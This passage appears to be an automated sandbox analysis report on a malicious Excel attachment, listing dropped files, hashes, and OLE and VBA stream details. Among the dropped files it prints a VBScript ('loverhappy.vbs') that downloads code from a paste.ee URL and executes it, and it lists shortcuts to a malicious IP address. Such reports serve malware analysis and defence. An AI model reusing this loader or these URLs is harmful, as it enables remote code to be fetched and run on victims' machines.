                                                  SHA-512:1A7B03AB436AF049AC59CF731DA9C44DB7A9CD52BC10E7C36EA8B1390BCAA1B7D2827510C67B347D81C750B3E7E275C6419818D57AE42BA5E0911D44712497A8
                                                  Malicious:false
                                                  Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...........................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\~DF387F9D3C28CBE579.TMP

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\~DF7A800E1E03CB42AF.TMP

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):368640
                                                  Entropy (8bit):7.210459896627157
                                                  Encrypted:false
                                                  SSDEEP:6144:BZunVXYpMqMZElNJ2G4g+61NedoWNvJ1RzVCiErCxEtjPOtioVjDGUU1qfDlavxw:BsVgSEXMcbNedomzEr+lbVH
                                                  MD5:CB7F2DB1B950333F52B13E629CBB8A37
                                                  SHA1:B142D8C38F1A1FA11F50A3C74B312B5B51BD5BF7
                                                  SHA-256:758796E59626373B439F29C8DE099442C77BFDE1FE9840D78797E7FC3A6342B9
                                                  SHA-512:27B9393C7A6B557292F895CE42233E862833DEF5F9D1C8D5B58F2F1BFD7105C61A4AEF53709FF5C33ED2CF7178CB8B85699D025B7C1D073F75C4550AE09AF6C5
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\~DFDDF60F314B1AAE00.TMP

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store

                                                  Download File
                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):10240
                                                  Entropy (8bit):0.6739662216458647
                                                  Encrypted:false
                                                  SSDEEP:12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
                                                  MD5:C61F99FE7BEE945FC31B62121BE075CD
                                                  SHA1:083BBD0568633FECB8984002EB4FE8FA08E17DD9
                                                  SHA-256:1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
                                                  SHA-512:46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
                                                  Malicious:false
                                                  Preview: ....+..F..N..F).~]............\.">.. .......p.J..} /o...rLj-...FS..'x.o..%^ .....zr/..3.y.e4...MM.4..x9.f.D..{..(....'p......9...Qn..d..+.....H..M.)..........].....n-.]........n&.*.H`.sz...r.....1B.....e.."...A.....,-....n..$.<....CO..VO..P..'.......<......n....&5s....z..$.{'IM-.o..(#N.-..(H...a&...y.S..`8.(./...1.P.. .....K.3.......I!]G....@N........F.l.T=.0...`"..L....B...B`nI.<.....&F..2J2....1..Rs....h.Zq.`...t..CJ....@.....I.G.e..k..H.....F..G:..6.G.l=.Y......:...C.........?[.ts...=....;.|...q...@....s................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei

                                                  Download File
                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):24152
                                                  Entropy (8bit):0.7532185028349225
                                                  Encrypted:false
                                                  SSDEEP:48:CMnfnO4FGtsFqN6t8nlztZKR6axR6uiozVb:ZnfO4kWKpZKdxR35
                                                  MD5:520FE964934AF1AB0CEBA2366830D0FA
                                                  SHA1:B90310ACA870261CB619FDFD1E54E1B1A25074FF
                                                  SHA-256:DBD45EEA386D364B30BA189E079BFA05C2C40D9E5E83722C39A171998ED079C1
                                                  SHA-512:A4839A6AB8DB522D9121A590B8C711E8C4F172D9CB71C918860F8048472920F3341B7BA624DFF514BE397809149E4471B2DF981DC81FE77C26B2DDF342A42F8C
                                                  Malicious:false
                                                  Preview: ...W....K.h.E..g..0...!1sm.[t\......A......5_...N{Yf?.w..[.Y..A...a^..(._.=.......:.v.$*.....e...F....f.qo.]...B1{.8.%%..,...;.|..<....g ....l.7.`ny.h.n.y...~Y.../.. .WZ.'......AI.|.._K}-$.i..<(.7Y...U....T.i.N.'Pt..c.[........<zni.::. 8W.<S...8!.Wh..;T.?.^yf...E?...pQ....i.;>/..^...r.YsncP..@.. .[".^..A.|.0..$<bC.G........~];..D.|.v.B.).g.E5.?... .N...}....i.,5..a.Fk.%.u.`..F...;xlw.}.5.Jt..c.5.....v...~)..8b|.*.B.]-]jk....PQZ..T}..M.S...88......?.*$..]..%V..D.<.5.d...[..Z.....2........%.$E..+sb.......*...g...>Q[l.}......@=..5L..._....Pi..HY.<[..l...H....9.\=u.v.....S8-&...,5..}t......m...*..R.W.G.NZ....w.....{.iA......G.f.TN.zk..(....q).....n....3..C...d./..........................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\agh on 91.92.244.96.url

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:MS Windows 95 Internet shortcut text (URL=<http://91.92.244.96/agh/>), ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):50
                                                  Entropy (8bit):4.608367439558376
                                                  Encrypted:false
                                                  SSDEEP:3:HRAbABGQYm//ocTf8n:HRYFVm//BTf8
                                                  MD5:7F0FE559A427BA1DA871C02824380B38
                                                  SHA1:26B5374D65D3BC107BBF41A1D10F82B2CEE210CB
                                                  SHA-256:F82BC457EC872ADBDF2041D449B96496BD976D5D54FCEBD514BC89B2C63A4775
                                                  SHA-512:D2746D743F59C31118FD68690DBE3C47A347DD06483F129FE7D6C9D206941B942127E26981C96EE1DD91C3674FD0D9EC1D136FB9412D375F6D804AE1034F5A40
                                                  Malicious:true
                                                  Preview:[InternetShortcut]..URL=http://91.92.244.96/agh/..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:Generic INItialization configuration [folders]
                                                  Category:modified
                                                  Size (bytes):251
                                                  Entropy (8bit):5.4025307192998175
                                                  Encrypted:false
                                                  SSDEEP:6:Jy5lIkJJwHL9iBRK3AbrmoTVJmIk6iQEJmIky:8XIkHwH4K3imOb1iQ2B
                                                  MD5:C213AFD926F5DC40038AA413BA92124D
                                                  SHA1:7F570B4B8BD2F6CDB7B9D09D036A0518A6A06677
                                                  SHA-256:3C90EEB6CF2A7CC8D09517AD2B49797D92E8D352E8992304BECA8B9270163014
                                                  SHA-512:818D6750BC3FC770D203EBC55869487A829F863E56F05885AEB901B722B949868A674C3A4F687C1FBFD6AAF6CDEFDEF39B1A45749107DBB2DE16CF62B40BD994
                                                  Malicious:false
                                                  Preview:[doC]..mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doC.url=0..[folders]..agh on 91.92.244.96.url=0..SHREE GANESH BOOK SERVICES-347274.LNK=0..[xls]..SHREE GANESH BOOK SERVICES-347274.LNK=0..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doC.url

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:MS Windows 95 Internet shortcut text (URL=<http://91.92.244.96/agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupd>), ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):159
                                                  Entropy (8bit):4.748703343159936
                                                  Encrypted:false
                                                  SSDEEP:3:HRAbABGQYm//ocTfGfymxOeKlQK2HEJJKF10ALADWAXQsDBRK3Aydn:HRYFVm//BTfuy5lIkJJwHL9iBRK3A+
                                                  MD5:F8554B3066455854272AFD2D3AB822E6
                                                  SHA1:69C70ECE5A8FDD8AA286DF440F60BB99A8F29CA8
                                                  SHA-256:255629720AC3E4AF1747AE0EF802BFA8BFBC1EE09C834F89E6EEB5D9042F1624
                                                  SHA-512:6B66A8AFA86A73174C6ED0B50F752EEF1C29FF5668F76E987BCF8EAC0C4A0EEBECDCEF94FCAB53C277790222CDE7CA35F0DCCD1FF3F365A83036C3925494BBBE
                                                  Malicious:true
                                                  Preview:[InternetShortcut]..URL=http://91.92.244.96/agh/mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday.doC..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.503835550707525
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
                                                  MD5:CB3D0F9D3F7204AF5670A294AB575B37
                                                  SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
                                                  SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
                                                  SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
                                                  Malicious:false
                                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                  C:\Users\user\AppData\Roaming\loverhappy.vbs

                                                  Download File
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):656
                                                  Entropy (8bit):3.52968128866232
                                                  Encrypted:false
                                                  SSDEEP:12:QjQhpDdcsYWUJ+nYWU2plgQDYWUqfHIYWU29RfgRasFf8fEl55X:QjQh9obIYq6kY4FgzcPFf8fmZ
                                                  MD5:340338BDFFD4DEE66D23FBA972F3EF0F
                                                  SHA1:E7940134DEA102B93C9AE0282F0440E790906480
                                                  SHA-256:3A03959A618CFD74DA22F345B33FC6209655B054009927E735DDA859E3EEFC51
                                                  SHA-512:9AE7DBA50F52BBA1A5E60B7DF8011E6326A303718F0C1DB4843027E5DE6651A919F30ABFFEC133C2760BA9CC2AFE09BC248DB0263B15F2FC1085C485F044859C
                                                  Malicious:true
                                                  Preview:..l.e.o.n.t.o.p.h.o.n.o. .=. . .(.I.n.t.(.(.c.a.c.u.m.b.u.-.c.h.i.b.a.r.r.a.d.a.+.1.).*.R.n.d.+.c.h.i.b.a.r.r.a.d.a.).).....S.e.t. .o.p.o.b.a.l.s.a.m.e.i.r.a. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.i.n.H.t.t.p...W.i.n.H.t.t.p.R.e.q.u.e.s.t...5...1.".).....o.p.o.b.a.l.s.a.m.e.i.r.a...O.p.e.n. .".G.E.T.".,.".h.t.t.p.:././.p.a.s.t.e...e.e./.d./.e.A.3.F.M.".,. .F.a.l.s.e.....o.p.o.b.a.l.s.a.m.e.i.r.a...S.e.n.d.....p.o.s.s.e.s.s.i.v.o. .=. .o.p.o.b.a.l.s.a.m.e.i.r.a...R.e.s.p.o.n.s.e.T.e.x.t.....c.l.i.e.n.t.e. .p.o.s.s.e.s.s.i.v.o.....F.u.n.c.t.i.o.n. .c.l.i.e.n.t.e.(.a.f.f.i.x.a.r.).....E.x.e.c.u.t.e.G.l.o.b.a.l. .a.f.f.i.x.a.r.....E.n.d. .F.u.n.c.t.i.o.n.

                                                  C:\Users\user\Desktop\6D330000

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Feb 14 07:30:14 2024, Security: 1
                                                  Category:dropped
                                                  Size (bytes):623616
                                                  Entropy (8bit):7.878804230416192
                                                  Encrypted:false
                                                  SSDEEP:12288:TzT21SEXMcbNedomzEc7lbVChOM6+ArydpTY0kVUm3LoKG:TISSMMednEilbV+OMnSYkVqKG
                                                  MD5:511326AEB0BFC6423F64DA92FD503978
                                                  SHA1:D521AF391AA924ED68687E221814FD5D7C56A6FE
                                                  SHA-256:A9F42B72D4EF396EFF22BE57E03D705A1A6B9361818D77311662E40FA1582C2A
                                                  SHA-512:1945E34F5E83E5F16F93A48F150457BEE9D1B85546C4CB7D2667E856B4BE37771FD5A9A167350481E55B53D34A0821CA438FCAAC4EB13946EF0160406872765F
                                                  Malicious:false
                                                  Preview:......................>.......................................................0...1...2.......v.......x.......z.................................................................................................................................................................................................................................................................................................................................................................................................................................../....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-...........................4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                  C:\Users\user\Desktop\6D330000:Zone.Identifier

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Users\user\Desktop\SHREE GANESH BOOK SERVICES-347274.xls (copy)

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Feb 14 07:30:14 2024, Security: 1
                                                  Category:dropped
                                                  Size (bytes):623616
                                                  Entropy (8bit):7.878804230416192
                                                  Encrypted:false
                                                  SSDEEP:12288:TzT21SEXMcbNedomzEc7lbVChOM6+ArydpTY0kVUm3LoKG:TISSMMednEilbV+OMnSYkVqKG
                                                  MD5:511326AEB0BFC6423F64DA92FD503978
                                                  SHA1:D521AF391AA924ED68687E221814FD5D7C56A6FE
                                                  SHA-256:A9F42B72D4EF396EFF22BE57E03D705A1A6B9361818D77311662E40FA1582C2A
                                                  SHA-512:1945E34F5E83E5F16F93A48F150457BEE9D1B85546C4CB7D2667E856B4BE37771FD5A9A167350481E55B53D34A0821CA438FCAAC4EB13946EF0160406872765F
                                                  Malicious:false
                                                  Preview:......................>.......................................................0...1...2.......v.......x.......z.................................................................................................................................................................................................................................................................................................................................................................................................................................../....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-...........................4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                  Static File Info

                                                  General

                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Feb 12 01:00:19 2024, Security: 1
                                                  Entropy (8bit):7.701969972343365
                                                  TrID:
                                                  • Microsoft Excel sheet (30009/1) 47.99%
                                                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                  File name:SHREE GANESH BOOK SERVICES-347274.xls
                                                  File size:570'880 bytes
                                                  MD5:23692e9e905328ad3c5dd2de8e259e52
                                                  SHA1:bdcd5bb9145ddefe14b022bc6a7adf04399fc0d4
                                                  SHA256:eab6d377a098bda79f6fd32c89b15e9dee1c29981973e8221a13abe63d798006
                                                  SHA512:a5704eae9df401ff4ff2224c2f85730d35caca3323d4e06729d6e515dc131c4ab01f69719a6225ac0f41ca5090721bbdbe9cac3487d31b5953e7e86cd1590e91
                                                  SSDEEP:12288:RTkLSEXMcbNedomzEDQa3bVClMIZ8GcQgcVnGKWk39UC4BmeO3:uSSMMednEDx3bV5GcwOi9F4E
                                                  TLSH:0AC40140FAC1CB0AE85507318EF35EDA5329FD829B524A4F311CB71E3DB07A55E2BA25
                                                  File Content Preview:........................>.......................................................0...1...2.......{.......o......................................................................................................................................................

                                                  File Icon

                                                  Icon Hash:276ea3a6a6b7bfbf

                                                  Static OLE Info

                                                  General

                                                  Document Type:OLE
                                                  Number of OLE Files:1

                                                  OLE File "SHREE GANESH BOOK SERVICES-347274.xls"

                                                  Indicators
                                                  Has Summary Info:
                                                  Application Name:Microsoft Excel
                                                  Encrypted Document:True
                                                  Contains Word Document Stream:False
                                                  Contains Workbook/Book Stream:True
                                                  Contains PowerPoint Document Stream:False
                                                  Contains Visio Document Stream:False
                                                  Contains ObjectPool Stream:False
                                                  Flash Objects Count:0
                                                  Contains VBA Macros:True
                                                  Summary
                                                  Code Page:1252
                                                  Author:
                                                  Last Saved By:
                                                  Create Time:2006-09-16 00:00:00
                                                  Last Saved Time:2024-02-12 01:00:19
                                                  Creating Application:Microsoft Excel
                                                  Security:1
                                                  Document Summary
                                                  Document Code Page:1252
                                                  Thumbnail Scaling Desired:False
                                                  Contains Dirty Links:False
                                                  Shared Document:False
                                                  Changed Hyperlinks:False
                                                  Application Version:786432

                                                  Streams with VBA

                                                  VBA File Name: Sheet1.cls, Stream Size: 977
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                  VBA File Name:Sheet1.cls
                                                  Stream Size:977
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 c . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 32 b8 63 f9 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  VBA Code
                                                  Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                  VBA File Name: Sheet2.cls, Stream Size: 977
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                  VBA File Name:Sheet2.cls
                                                  Stream Size:977
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 32 b8 fd 18 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  VBA Code
                                                  Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                  VBA File Name: Sheet3.cls, Stream Size: 977
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                  VBA File Name:Sheet3.cls
                                                  Stream Size:977
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . o . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 32 b8 0a 6f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  VBA Code
                                                  Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                  VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                  VBA File Name:ThisWorkbook.cls
                                                  Stream Size:985
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 32 b8 d5 1f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  VBA Code
                                                  Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                  Streams

                                                  Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                  General
                                                  Stream Path:\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:114
                                                  Entropy:4.25248375192737
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                  General
                                                  Stream Path:\x5DocumentSummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:244
                                                  Entropy:2.889430592781307
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                  General
                                                  Stream Path:\x5SummaryInformation
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:200
                                                  Entropy:3.3020681057018666
                                                  Base64 Encoded:False
